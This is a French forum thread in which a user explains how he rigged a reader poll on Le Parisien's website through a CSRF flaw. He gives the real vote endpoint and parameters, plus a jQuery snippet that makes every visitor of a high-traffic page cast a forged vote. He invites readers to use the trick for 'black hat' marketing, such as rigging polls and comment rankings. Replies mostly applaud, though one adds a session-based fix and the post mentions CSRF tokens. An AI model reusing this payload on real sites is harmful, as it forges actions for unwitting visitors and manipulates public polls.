Comment j'ai truqué les sondages du journal "Le Parisien" ?

Julien G · #1 2015-07-18 15:11:52

Bonjour,

Je ne suis pas un expert en SEO, moi mon truc c'est contourner les limites ! Aller là ou personne n'a jamais été...
C'est pour ça qu'il n'y a pas si longtemps que ça j'étais à fond dans la sécurité informatique et pour dépasser les limites je cherchais des failles de sécurité. Sur des banques françaises (qui doivent encore y être, ils m'ont racrochés au nez avant l'explication), Free (numéro surtaxé non merci) , Decitre (merci pour le livre sur le SEO) et le journal "le Parisien" (très sympathiques, faille corrigée). Je suis pas un "mauvais bougre" après chaque exploitation et un petit screen aux copains ( ), j'appellais le site en question.

Je vais vous parler du journal le Parisien, pour vous présenter les possibilités black hat en marketing (bien que ça ne soit pas bien ne pas faire ) en exploitant les failles de sécurité.
Il y avait un sondage qui disait :

Trouvez-vous normal que Julie Gayet bénéficie des moyens de l'Etat ?

J'étais d'humeur taquine et j'ai décidé de dire que "OUI" la copine du président devait se faire payer les croissants avec nos impôts ! J'ai donc boosté ça et admirer les commentaires. UN DÉLICE !

Pourquoi est ce que je vous raconte tout ça ? Car ceci pourrait être appliqué pour truquer des sondages en votre faveur, mettre votre commentaire en top commentaire sur des sites (oublier ça avec un module Facebook grrr), etc ! Quand vous ne pouvez pas passer par la porte de devant, il suffit de prendre la porte de derrière (pour l'exemple hein, le Black Hat c'est mal)

Petite explication technique pour les intéressés :

J'ai analysé la requête envoyée par mon navigateur pour effectuer un vote.

Une requete POST sur l'URL "www.leparisien.fr/article/4528217/vote" avec comme paramètres "id_question" qui vaut "3641" et sert au serveur à identifier à quelle question on répond. On a aussi "id_reponse" qui vaut "8043" et correspond à la réponse "NON".
En créant un petit script en Javascript et l'intégrant sur une page à fort trafic, chaque visiteur enverra un vote "NON" sur le sondage.

<script src="//code.jquery.com/jquery-1.10.2.js"></script>

<script>

$.post( "http://www.leparisien.fr/article/4528217/vote", { id_question: "3641", id_reponse: "8043" } );

</script>

Voilà comment ça se traduit en programmation ! Pour les curieux encore la, la faille se nomme CSRF (Cross-Site Request Forgeries).

Comment sécuriser ceci ?

Il suffit d'ajouter un jeton de sécurité dans les paramètres qui sera généré puis vérifier par le serveur.

J'éspère que ce petit exemple vous aura donné des idées ! Pour la petite annecdote ce type de faille à été trouvé sur YouTube il y a 1 ou 2 mois

Plus qu'un tutoriel sur les failles web, je vous montre une façon de penser : la mienne.
Merci de votre lecture !
Julien G,

Dernière modification par Julien G (2015-07-18 15:13:45)

Webredaction · #2 2015-07-18 17:02:54

Félicitations
C'est vraiment hallucinant de constater qu'ils n'utilisent pas un token !

Julien G · #3 2015-07-18 22:17:00

Webredaction a écrit :

Félicitations
C'est vraiment hallucinant de constater qu'ils n'utilisent pas un token !

Et les banques n'utilisent pas de htmlentities() sur leurs paramètres GET !
C'est hallucinant tout de même je te l'accorde !

jeromeweb · #4 2015-07-19 08:41:10

Joli :-)

decamat · #5 2015-07-19 09:18:31

Merci, effectivement il suffit parfois de prendre un peu de recul et de penser différemment des autres moutons...

wildjack · #6 2015-07-19 13:07:12

tres interessant cette facon de voir, merci

razbithume · #7 2015-07-20 07:47:18

sympa l'explication

uode · #8 2015-07-20 08:04:53

Dingue le peu de sécurité pour un site de cette réputation, heureusement qu'on utilise pas le même système pour les présidentielles...

korleonbiz · #9 2015-07-20 08:19:26

J'aime!!!

msieur_benjamin · #10 2015-07-20 08:24:10

Bien joué

jeromeweb · #11 2015-07-20 12:41:55

uode a écrit :

Dingue le peu de sécurité pour un site de cette réputation, heureusement qu'on utilise pas le même système pour les présidentielles...

Les vieux sites sont tellement des usines à gaz au fur et à mesure des années qu'il y a plein de failles de la sorte, bien que ça paraisse incroyable

CaptainSeo · #12 2015-07-20 13:56:48

C'est plutôt fort ça !
Merci pour ton explication

salemioche · #13 2015-10-20 06:43:10

Merci jquery pour ces nouvelles opportunités ( avant, on collait ca dans un src d'une img, mais ca ne marchait que pour les GET )

Si vous voulez sécuriser un tout petit peu, sans vous embeter :

à la fin de la page (on autorise le visiteur à voter sur la question):
$_SESSION[$id_question] = true;

en début de page de réception de vote :
if ( ! $_SESSION[$id_question] ) die('');

Merci Julien

cb_nalex · #14 2015-10-22 13:39:01

^^ GG

reyvax50 · #15 2015-11-16 15:11:02

J'étais d'humeur taquine et j'ai décidé de dire que "OUI" la copine du président devait se faire payer les croissants avec nos impôts !

Au delà du coté technique, J'adore et j'adhère à cet état esprit :-)

Merci pour l'échange

Julien_G · #16 2016-02-16 12:47:59

Je me permet de UP mon premier topic pour ceux qui l'aurait loupé

Jaffaar · #17 2016-02-16 12:48:46

LOURD !

Woods · #18 2016-02-16 13:01:51

Good partage ! c'est du beau, ça change des partages de scripts kiddies que l'on trouve sur les forums de hacking.

Pour ceux qui souhaitent s'initier/s'entrainer aux failles web, parmi les sites de challenge les plus connus il y a :
hxtp://www.newbiecontest.org
hxtp://www.root-me.org/fr/Challenges/

Et ma petite selection des meilleurs communautés fr avec de sacrés bon tutos :

hxtp://n-pn.fr
hxtp://hackademics.fr

Dernière modification par Woods (2016-02-16 13:04:02)

Julien_G · #19 2016-02-16 13:16:25

Woods a écrit :

Good partage ! c'est du beau, ça change des partages de scripts kiddies que l'on trouve sur les forums de hacking.
Pour ceux qui souhaitent s'initier/s'entrainer aux failles web, parmi les sites de challenge les plus connus il y a :
hxtp://www.newbiecontest.org
hxtp://www.root-me.org/fr/Challenges/
Et ma petite selection des meilleurs communautés fr avec de sacrés bon tutos :
hxtp://n-pn.fr
hxtp://hackademics.fr

J'approuve les sites de challenges même si j'ai jamais été fan et j'ai toujours préféré tester sur le terrain

Pour les forums j'ai déserté aussi depuis la mort de Unity-Soft, il y a trop de gens qui veulent tout sans rien dans ce genre de forum je trouve mais merci des adresses !

aolivier · #20 2016-02-16 13:38:41

Good job !

🟣 Comment j'ai truqué les sondages du journal "Le Parisien" ?

#1 2015-07-18 15:11:52

Comment j'ai truqué les sondages du journal "Le Parisien" ?

#2 2015-07-18 17:02:54

Re : Comment j'ai truqué les sondages du journal "Le Parisien" ?

#3 2015-07-18 22:17:00

Re : Comment j'ai truqué les sondages du journal "Le Parisien" ?

#4 2015-07-19 08:41:10

Re : Comment j'ai truqué les sondages du journal "Le Parisien" ?

#5 2015-07-19 09:18:31

Re : Comment j'ai truqué les sondages du journal "Le Parisien" ?

#6 2015-07-19 13:07:12

Re : Comment j'ai truqué les sondages du journal "Le Parisien" ?

#7 2015-07-20 07:47:18

Re : Comment j'ai truqué les sondages du journal "Le Parisien" ?

#8 2015-07-20 08:04:53

Re : Comment j'ai truqué les sondages du journal "Le Parisien" ?

#9 2015-07-20 08:19:26

Re : Comment j'ai truqué les sondages du journal "Le Parisien" ?

#10 2015-07-20 08:24:10

Re : Comment j'ai truqué les sondages du journal "Le Parisien" ?

#11 2015-07-20 12:41:55

Re : Comment j'ai truqué les sondages du journal "Le Parisien" ?

#12 2015-07-20 13:56:48

Re : Comment j'ai truqué les sondages du journal "Le Parisien" ?

#13 2015-10-20 06:43:10

Re : Comment j'ai truqué les sondages du journal "Le Parisien" ?

#14 2015-10-22 13:39:01

Re : Comment j'ai truqué les sondages du journal "Le Parisien" ?

#15 2015-11-16 15:11:02

Re : Comment j'ai truqué les sondages du journal "Le Parisien" ?

#16 2016-02-16 12:47:59

Re : Comment j'ai truqué les sondages du journal "Le Parisien" ?

#17 2016-02-16 12:48:46

Re : Comment j'ai truqué les sondages du journal "Le Parisien" ?

#18 2016-02-16 13:01:51

Re : Comment j'ai truqué les sondages du journal "Le Parisien" ?

#19 2016-02-16 13:16:25

Re : Comment j'ai truqué les sondages du journal "Le Parisien" ?

#20 2016-02-16 13:38:41

Re : Comment j'ai truqué les sondages du journal "Le Parisien" ?

Pied de page des forums